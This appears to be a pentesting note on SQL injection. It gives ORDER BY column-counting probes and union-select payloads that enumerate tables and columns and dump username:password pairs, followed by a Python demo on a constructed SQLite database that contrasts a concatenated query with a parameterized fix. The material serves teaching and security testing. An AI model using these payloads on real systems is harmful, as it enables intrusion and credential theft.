# SQLI

Occurs when user input is concatenated directly into the SQL query string without proper sanitization, filtering, or parameterization, so the input is interpreted as part of the query itself.

[Here is a nice SQLi cheat sheet](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)

If you find a vulnerable endpoint, it's probably best to use a tool like [SQLmap](https://github.com/sqlmapproject/sqlmap).

#### Popular Databases

* MySQL, MSSQL, PostgreSQL, Oracle.

### SQLi testing

If you ever see a database error like the ones below, you know there is SQL injection:

<figure><img src="https://1674729424-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyzdFWSUijzVYOP1hAsit%2Fuploads%2F6vaNMob1N8uOw0righzR%2Fimage.png?alt=media&#x26;token=ebc8910c-89cd-4837-8605-cb24d05e17f4" alt=""><figcaption><p>MySQL error indicating SQL injection</p></figcaption></figure>

<figure><img src="https://1674729424-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyzdFWSUijzVYOP1hAsit%2Fuploads%2FDm9numYadRQz5em6qat2%2Fimage.png?alt=media&#x26;token=69ba440b-5450-4793-b4f5-54896232dc2b" alt=""><figcaption><p>PostgreSQL SQL error</p></figcaption></figure>

Inject an `order by` clause that sorts the results by column position (1, then 2, then 3, ...) and increment the number until the database returns an error saying the specified column does not exist:

* using `' order by <Number here>--`
* for example, if `order by 3` fails, the query returns 2 columns, so a union payload must also supply 2 columns

#### List of tables in the database

Use union select to list tables in the database:

payload: `' union select NULL, table_name from information_schema.tables--`

<figure><img src="https://1674729424-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyzdFWSUijzVYOP1hAsit%2Fuploads%2FgfsNhDITfBTqCiMF37Dc%2Fimage.png?alt=media&#x26;token=f916ad23-0a1d-474c-9559-9499a3aaa611" alt=""><figcaption></figcaption></figure>

#### List of columns in the users table

payload: `' union select NULL, column_name from information_schema.columns where table_name = '<Table Name Here>'--`

<figure><img src="https://1674729424-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyzdFWSUijzVYOP1hAsit%2Fuploads%2FyABwz5zsd9MWInxUUk9w%2Fimage.png?alt=media&#x26;token=2bdafab4-792a-4820-b65e-73e5ab8d9a61" alt=""><figcaption></figcaption></figure>

#### Dumping usernames and passwords of users

Use the `concat()` function to return the password and username in the same column.

payload: `' union select NULL, concat(<Column Name>,':',<Column Name 2>) from <Table Name>--`

<figure><img src="https://1674729424-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyzdFWSUijzVYOP1hAsit%2Fuploads%2FrrIFaidNBqpEm3mN1m4y%2Fimage.png?alt=media&#x26;token=eade7220-3721-4e24-b7a4-7183e2ec44cc" alt=""><figcaption></figcaption></figure>
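Added example (not from the original notes): a vulnerable search endpoint built by string concatenation next to its parameterized fix, run against a constructed in-memory SQLite database so the union payload shape above can be reproduced offline. SQLite stands in for MySQL/PostgreSQL and has no portable `concat()`, so the payload uses `||`; the `products`/`users` tables and their rows are constructed sample data.

```python
import sqlite3

# Constructed demo data: a two-column product search (the shape an ORDER BY
# probe would reveal) and a users table the attacker wants to dump.
SCHEMA = """
CREATE TABLE products (id INTEGER, name TEXT);
INSERT INTO products VALUES (1, 'hammer'), (2, 'wrench');
CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'alice', 'hunter2'), (2, 'bob', 'letmein');
"""

# Same pattern as the page's dump payload; SQLite concatenates with || rather
# than concat(). The trailing -- comments out the query's closing quote.
UNION_PAYLOAD = "' union select NULL, username || ':' || password from users--"


def connect():
    """Fresh in-memory database loaded with the constructed schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_vulnerable(conn, term):
    """Builds SQL by concatenation: the input becomes part of the query text,
    so a quote plus a UNION lets the caller append their own SELECT."""
    sql = "SELECT id, name FROM products WHERE name = '" + term + "'"
    return conn.execute(sql).fetchall()


def search_parameterized(conn, term):
    """Binds the input as a parameter: the driver sends it as a value, never
    as SQL, so the same payload is just a product name that matches nothing."""
    sql = "SELECT id, name FROM products WHERE name = ?"
    return conn.execute(sql, (term,)).fetchall()


if __name__ == "__main__":
    db = connect()
    print("legit search      :", search_vulnerable(db, "hammer"))
    print("vulnerable + union:", search_vulnerable(db, UNION_PAYLOAD))
    print("parameterized     :", search_parameterized(db, UNION_PAYLOAD))
```

The vulnerable function leaks every `username:password` pair as the second column, while the parameterized version returns an empty result for the identical input.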
